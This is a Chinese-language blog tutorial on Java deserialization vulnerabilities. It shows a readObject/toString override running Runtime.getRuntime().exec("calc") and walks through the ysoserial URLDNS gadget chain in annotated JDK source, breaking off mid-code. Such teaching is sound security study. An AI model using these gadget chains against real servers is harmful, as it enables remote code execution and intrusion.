

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Simply">
  <meta name="keywords" content="">
  
    <meta name="description" content="Java反序列化介绍：序列化（Serialization）：把Java对象转换为字节序列的过程。反序列化（DeSerialization）：把字节序列恢复为Java对象的过程。 其中有两个重要的方法：writeObject和readObject。序列化时需要使用writeObject将对象转化为字节流，反序列化需要使用readObject将字节流转化为对象。 反序列化基础操作打开idea，创建项目">
<meta property="og:type" content="article">
<meta property="og:title" content="java反序列化和类加载机制">
<meta property="og:url" content="http://example.com/2024/05/20/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/index.html">
<meta property="og:site_name" content="manic的小站">
<meta property="og:description" content="Java反序列化介绍：序列化（Serialization）：把Java对象转换为字节序列的过程。反序列化（DeSerialization）：把字节序列恢复为Java对象的过程。 其中有两个重要的方法：writeObject和readObject。序列化时需要使用writeObject将对象转化为字节流，反序列化需要使用readObject将字节流转化为对象。 反序列化基础操作打开idea，创建项目">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/%E5%B0%81%E9%9D%A2.png">
<meta property="article:published_time" content="2024-05-20T02:41:41.000Z">
<meta property="article:modified_time" content="2024-05-20T03:35:57.758Z">
<meta property="article:author" content="manic">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="Java反序列化">
<meta property="article:tag" content="类加载">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/%E5%B0%81%E9%9D%A2.png">
  
  
  
  <title>java反序列化和类加载机制 - manic的小站</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/fluid-extension.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":"<script type=\"text/javascript\" src=\"//js.users.51.la/21878401.js\"></script>","cnzz":null,"leancloud":{"app_id":"qVt8NXjQ9TtyqRuEu33vSsa8-MdYXbMMI","app_key":"PnaI7SpPcfzKKWOFjPdc4lKU","server_url":null,"path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    <!-- 51.la Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript('//js.users.51.la/&lt;script type=&#34;text/javascript&#34; src=&#34;//js.users.51.la/21878401.js&#34;&gt;&lt;/script&gt;.js');
      }
    </script>
  

  

  
    
  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>manic&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="java反序列化和类加载机制"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-05-20 10:41" pubdate>
          2024年5月20日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          14k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          118 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">java反序列化和类加载机制</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="Java反序列化介绍："><a href="#Java反序列化介绍：" class="headerlink" title="Java反序列化介绍："></a>Java反序列化介绍：</h3><p>序列化（Serialization）：把Java对象转换为字节序列的过程。<br>反序列化（DeSerialization）：把字节序列恢复为Java对象的过程。</p>
<p>其中有两个重要的方法：<code>writeObject</code>和<code>readObject</code>。序列化时需要使用<code>writeObject</code>将对象转化为字节流，反序列化需要使用<code>readObject</code>将字节流转化为对象。</p>
<h4 id="反序列化基础操作"><a href="#反序列化基础操作" class="headerlink" title="反序列化基础操作"></a>反序列化基础操作</h4><p>打开idea，创建项目，新建一个 Person 类，创建一些属性和方法（注：要想对类进行序列化操作，需要实现 Serializable 类）</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424103734758.png" srcset="/img/loading.gif" lazyload alt="image-20240424103734758"></p>
<p>新建一个 Serialization 类，代码中调用 <em><strong>writeObject</strong></em> 方法进行序列化操作，运行后会生成一个名为 ser.bin 的序列化文件</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424104644674.png" srcset="/img/loading.gif" lazyload alt="image-20240424104644674"></p>
<p>新建一个 Unserialization 类，调用 <em><strong>readObject</strong></em> 方法对 ser.bin 文件内容进行反序列化操作，然后输出反序列化后的对象</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424110324114.png" srcset="/img/loading.gif" lazyload alt="image-20240424110324114"></p>
<h4 id="反序列化漏洞原理"><a href="#反序列化漏洞原理" class="headerlink" title="反序列化漏洞原理"></a>反序列化漏洞原理</h4><p>根据上面的例子，可见完成序列化和反序列化离不开两个重要的方法 <code>writeObject</code> 和 <code>readObject</code> ，这两个方法可以经过开发者重写，一般序列化的重写都是由于下面这种场景诞生的。</p>
<p>只要服务端反序列化数据，客户端传递类的 <code>readObject</code> 中代码会自动执行，基于攻击者在服务器上运行代码的能力。</p>
<h3 id="漏洞利用条件"><a href="#漏洞利用条件" class="headerlink" title="漏洞利用条件"></a>漏洞利用条件</h3><ol>
<li>大前提：参与序列化的所有类都继承了 <code>Serializable</code>，即所有类都是可序列化的</li>
<li>入口类重写了 <code>readObject()</code>方法，且其参数类型宽泛，并且是 <code>jdk</code>自带的</li>
<li>构造调用链</li>
<li>执行类 (RCE、SSRF、读写文件等)</li>
</ol>
<h3 id="产生安全问题的形式"><a href="#产生安全问题的形式" class="headerlink" title="产生安全问题的形式"></a>产生安全问题的形式</h3><ol>
<li>入口类的 <code>readObject()</code>中调用了危险方法</li>
<li>入口类参数中包含可控类，该类调用 <code>readObject()</code>时会触发危险方法</li>
<li>入口类参数中包含可控类，该类 <code>readObject()</code>时调用其他类，其他类继续调用另一个类(套娃)，直到有一个类调用了危险方法 (正常情况下反序列化漏洞的利用方法)</li>
<li>构造函数&#x2F;静态代码块等类加载时隐式执行</li>
</ol>
<p>接下来对每种形式进行举例讲解：</p>
<h4 id="1-入口类的-readObject-直接调用危险方法"><a href="#1-入口类的-readObject-直接调用危险方法" class="headerlink" title="1.入口类的 readObject 直接调用危险方法"></a>1.入口类的 readObject 直接调用危险方法</h4><p>这种情况不太可能出现，但还是讲一下原理</p>
<p>在Person类中重写 readObject 方法，调用 <em>Runtime</em>.<em>getRuntime</em>().<em>exec</em>() 执行计算器</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424133907888.png" srcset="/img/loading.gif" lazyload alt="image-20240424133907888"></p>
<p>进行序列化操作，生成ser.bin文件，对ser.bin文件反序列化时会调用重写的 readObject 方法，从而执行计算器</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424134034223.png" srcset="/img/loading.gif" lazyload alt="image-20240424134034223"></p>
<figure class="highlight inform7"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs inform7">原理：<br>1、在Java中，当一个类实现了Serializable接口并且重写readObject方法时，该方法会在对象进行反序列化时被调用。<br>2、由于在<span class="hljs-keyword">Person</span>类中实现了Serializable接口，并且重写了readObject方法，所以在反序列化时调用ois.readObject()会触发<span class="hljs-keyword">Person</span>类的readObject方法。<br></code></pre></td></tr></table></figure>

<p>一般不会有程序员这么写…</p>
<h4 id="2-入口类参数中包含可控类，该类有危险方法，readObject-时调用"><a href="#2-入口类参数中包含可控类，该类有危险方法，readObject-时调用" class="headerlink" title="2.入口类参数中包含可控类，该类有危险方法，readObject 时调用"></a>2.入口类参数中包含可控类，该类有危险方法，readObject 时调用</h4><p>toSting 方法：当使用 System.out.println() 打印对象时，实际上会调用该对象的 toString 方法来获取字符串表示形式</p>
<p>在Person类中重写 <em>toString</em> 方法，调用计算器</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424135426887.png" srcset="/img/loading.gif" lazyload alt="image-20240424135426887"></p>
<p>进行序列化操作，生成ser.bin文件，对ser.bin文件反序列化时会调用重写的 toString 方法，从而执行计算器</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424135758323.png" srcset="/img/loading.gif" lazyload alt="image-20240424135758323"></p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sqf">原理：<br><span class="hljs-number">1</span>、obj是通过反序列化得到的，其类型是Person，而Person类中重写了<span class="hljs-built_in">toString</span>方法，所以在打印时会调用Person类的<span class="hljs-built_in">toString</span>方法。<br><span class="hljs-number">2</span>、由于<span class="hljs-built_in">toString</span>方法包含了执行Runtime.getRuntime().<span class="hljs-built_in">exec</span>(<span class="hljs-string">&quot;calc&quot;</span>)的代码，导致计算器弹出。<br></code></pre></td></tr></table></figure>


<p>但这本身其实是由于打印对象时造成的安全问题，和反序列化并没有太大关系，</p>
<p>只是想说如果对方在反序列化的时候同时打印了对象，那么这里也可以成为一个利用点。</p>
<h4 id="3-入口类参数中包含可控类，该类又调用其他有危险方法的类，readObject时调用"><a href="#3-入口类参数中包含可控类，该类又调用其他有危险方法的类，readObject时调用" class="headerlink" title="3.入口类参数中包含可控类，该类又调用其他有危险方法的类，readObject时调用"></a>3.入口类参数中包含可控类，该类又调用其他有危险方法的类，readObject时调用</h4><p>这里使用 URLDNS反序列化链 进行分析</p>
<p><code>URLDNS</code> 是ysoserial中利用链的一个名字，通常用于检测是否存在Java反序列化漏洞。该利用链具有如下特点：</p>
<ul>
<li>不限制jdk版本，使用Java内置类，对第三方依赖没有要求</li>
<li>目标无回显，可以通过DNS请求来验证是否存在反序列化漏洞</li>
<li>URLDNS利用链，只能发起DNS请求，并不能进行其他利用</li>
</ul>
<h6 id="URLDNS反序列化链复现："><a href="#URLDNS反序列化链复现：" class="headerlink" title="URLDNS反序列化链复现："></a>URLDNS反序列化链复现：</h6><p>利用 ysoserial-0.0.6-SNAPSHOT-all.jar 工具生成一个序列化数据</p>
<p>链接：<a target="_blank" rel="noopener" href="https://github.com/Y4er/ysoserial">https://github.com/Y4er/ysoserial</a></p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424144200349.png" srcset="/img/loading.gif" lazyload alt="image-20240424144200349"></p>
<p>创建一个 <em>UnseriaTest</em> 类，对 urldns.txt 文件进行反序列化操作，urldns.txt需要放到项目目录下</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424144448230.png" srcset="/img/loading.gif" lazyload alt="image-20240424144448230"></p>
<p>dnslog成功收到请求</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424144601351.png" srcset="/img/loading.gif" lazyload alt="image-20240424144601351"></p>
<h6 id="URLDNS反序列化链分析："><a href="#URLDNS反序列化链分析：" class="headerlink" title="URLDNS反序列化链分析："></a>URLDNS反序列化链分析：</h6><p>根据 ysoserial 中列出的 Gadget 进行分析：</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">*   Gadget Chain:<span class="hljs-operator"></span><br><span class="hljs-operator">*     </span><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">HashMap</span>.</span></span>read<span class="hljs-constructor">Object()</span><span class="hljs-operator"></span><br><span class="hljs-operator">*       </span><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">HashMap</span>.</span></span>put<span class="hljs-constructor">Val()</span><span class="hljs-operator"></span><br><span class="hljs-operator">*         </span><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">HashMap</span>.</span></span>hash<span class="hljs-literal">()</span><span class="hljs-operator"></span><br><span class="hljs-operator">*           </span><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">URL</span>.</span></span>hash<span class="hljs-constructor">Code()</span><br></code></pre></td></tr></table></figure>

<p>具体流程就是：<code>java.util.HashMap</code> 重写了 <code>readObject</code>, 在反序列化时会调用 <code>hash</code> 函数计算 key 的 hashCode，而传入 <code>java.net.URL</code> 类的时候会调用 URL.hashCode() ，URL.hashCode() 在计算时会调用 <code>getHostAddress</code> 来解析域名, 从而发出 DNS 请求</p>
<p><strong>HashMap#readObject：</strong></p>
<p>代码中敲一个 <em>HashMap</em>  (HashMap 是 Java 中一种常用的数据结构，用于存储键值对，它基于哈希表实现，可以高效地存储和检索数据)，然后ctrl+鼠标点过去，搜索一下重写的 readObject 方法</p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240424151032287.png" srcset="/img/loading.gif" lazyload alt="image-20240424151032287"></p>
<p>代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">readObject</span><span class="hljs-params">(java.io.ObjectInputStream s)</span> <span class="hljs-comment">// 读取传入的输入流，对传入的序列化数据进行反序列化</span><br>        <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException &#123;<br>        <span class="hljs-comment">// 读取阈值(忽略)、加载因子和任何隐藏内容</span><br>        s.defaultReadObject(); <span class="hljs-comment">//使用 s.defaultReadObject() 读取并忽略阈值（threshold）、负载因子（loadfactor）和任何隐藏信息。</span><br>        reinitialize(); <span class="hljs-comment">//重新初始化 HashMap 对象</span><br>        <span class="hljs-keyword">if</span> (loadFactor &lt;= <span class="hljs-number">0</span> || Float.isNaN(loadFactor))<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvalidObjectException</span>(<span class="hljs-string">&quot;Illegal load factor: &quot;</span> +<br>                                             loadFactor);<br>        s.readInt();                <span class="hljs-comment">// 读取并忽略存储桶数量</span><br>        <span class="hljs-type">int</span> <span class="hljs-variable">mappings</span> <span class="hljs-operator">=</span> s.readInt(); <span class="hljs-comment">// 从输入流中读取映射数（即 HashMap 的大小）。如果映射数小于 0，则抛出 InvalidObjectException。</span><br>        <span class="hljs-keyword">if</span> (mappings &lt; <span class="hljs-number">0</span>)<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">InvalidObjectException</span>(<span class="hljs-string">&quot;Illegal mappings count: &quot;</span> +<br>                                             mappings);<br>        <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (mappings &gt; <span class="hljs-number">0</span>) &#123; <br>            <span class="hljs-comment">// 如果映射数大于 0，则根据负载因子和映射数调整表的容量。容量范围在 DEFAULT_INITIAL_CAPACITY 到 MAXIMUM_CAPACITY 之间。</span><br>            <span class="hljs-type">float</span> <span class="hljs-variable">lf</span> <span class="hljs-operator">=</span> Math.min(Math.max(<span class="hljs-number">0.25f</span>, loadFactor), <span class="hljs-number">4.0f</span>);<br>            <span class="hljs-type">float</span> <span class="hljs-variable">fc</span> <span class="hljs-operator">=</span> (<span class="hljs-type">float</span>)mappings / lf + <span class="hljs-number">1.0f</span>;<br>            <span class="hljs-type">int</span> <span class="hljs-variable">cap</span> <span class="hljs-operator">=</span> ((fc &lt; DEFAULT_INITIAL_CAPACITY) ?<br>                       DEFAULT_INITIAL_CAPACITY :<br>                       (fc &gt;= MAXIMUM_CAPACITY) ?<br>                       MAXIMUM_CAPACITY :<br>                       tableSizeFor((<span class="hljs-type">int</span>)fc));<br>            <span class="hljs-type">float</span> <span class="hljs-variable">ft</span> <span class="hljs-operator">=</span> (<span class="hljs-type">float</span>)cap * lf;<br>            threshold = ((cap &lt; MAXIMUM_CAPACITY &amp;&amp; ft &lt; MAXIMUM_CAPACITY) ?<br>                         (<span class="hljs-type">int</span>)ft : Integer.MAX_VALUE);<br><br>            <span class="hljs-comment">// 创建一个指定容量的 Node 数组作为 HashMap 的表（table）</span><br>            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);<br>            <span class="hljs-meta">@SuppressWarnings(&#123;&quot;rawtypes&quot;,&quot;unchecked&quot;&#125;)</span><br>            Node&lt;K,V&gt;[] tab = (Node&lt;K,V&gt;[])<span class="hljs-keyword">new</span> <span class="hljs-title class_">Node</span>[cap];<br>            table = tab;<br><br>            <span class="hljs-comment">// 从输入流中依次读取键和值，并使用 putVal 方法将映射放入 HashMap 中</span><br>            <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i &lt; mappings; i++) &#123;<br>                <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>                    <span class="hljs-type">K</span> <span class="hljs-variable">key</span> <span class="hljs-operator">=</span> (K) s.readObject();<br>                <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>                    <span class="hljs-type">V</span> <span class="hljs-variable">value</span> <span class="hljs-operator">=</span> (V) s.readObject();<br>                putVal(hash(key), key, value, <span class="hljs-literal">false</span>, <span class="hljs-literal">false</span>);<br>            &#125;<br>        &#125;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>前面不懂可以不看，重点在<code>putVal</code>方法</p>
<p><strong>HashMap.putVal()：</strong></p>
<p><code>putVal</code>是往HashMap中放入键值对的方法，putVal 里调用了hash方法来处理key</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i &lt; mappings; i++) &#123;<br>    <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>        <span class="hljs-type">K</span> <span class="hljs-variable">key</span> <span class="hljs-operator">=</span> (K) s.readObject();<br>    <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>        <span class="hljs-type">V</span> <span class="hljs-variable">value</span> <span class="hljs-operator">=</span> (V) s.readObject();<br>    putVal(hash(key), key, value, <span class="hljs-literal">false</span>, <span class="hljs-literal">false</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p><strong>HashMap.hash()：</strong></p>
<p>跟进hash方法，这里又调用了<code>key.hashcode</code>方法，根据调用链来看，传入的是 key 值是<code>URL</code> 对象，所以调用的是 <code>URL.hashCode()</code> </p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">int</span> <span class="hljs-title function_">hash</span><span class="hljs-params">(Object key)</span> &#123;<br>        <span class="hljs-type">int</span> h;<br>        <span class="hljs-keyword">return</span> (key == <span class="hljs-literal">null</span>) ? <span class="hljs-number">0</span> : (h = key.hashCode()) ^ (h &gt;&gt;&gt; <span class="hljs-number">16</span>);<br>    &#125;<br></code></pre></td></tr></table></figure>

<p><strong>URL#hashCode：</strong></p>
<p>那么跟进到这个 URL 类的 hashCode() 方法看下，导入一个URL类，ctrl+鼠标点过去，搜索 hashCode() 方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">synchronized</span> <span class="hljs-type">int</span> <span class="hljs-title function_">hashCode</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">if</span> (hashCode != -<span class="hljs-number">1</span>)<br>            <span class="hljs-keyword">return</span> hashCode;<br><br>        hashCode = handler.hashCode(<span class="hljs-built_in">this</span>);<br>        <span class="hljs-keyword">return</span> hashCode;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>判断如果 hashCode 不为<code>-1</code>，那么直接返回了，代码中 hashCode 是通过<code>private</code>关键字进行修饰的赋值为-1，所以会执行下一步进行<code>handler.hashCode(this)</code> </p>
<p><img src="/img/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/image-20240425094458802.png" srcset="/img/loading.gif" lazyload alt="image-20240425094458802"></p>
<p>查看 <code>handler.hashCode(this)</code>  方法的定义，重点关注这里的 getHostAddress 方法，正是这步触发了dns请求：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">protected</span> <span class="hljs-type">int</span> <span class="hljs-title function_">hashCode</span><span class="hljs-params">(URL u)</span> &#123;<br>        <span class="hljs-type">int</span> <span class="hljs-variable">h</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>;<br><br>        <span class="hljs-comment">// 生成协议部分</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">protocol</span> <span class="hljs-operator">=</span> u.getProtocol();<br>        <span class="hljs-keyword">if</span> (protocol != <span class="hljs-literal">null</span>)<br>            h += protocol.hashCode();<br><br>        <span class="hljs-comment">// 生成host部分</span><br>        <span class="hljs-type">InetAddress</span> <span class="hljs-variable">addr</span> <span 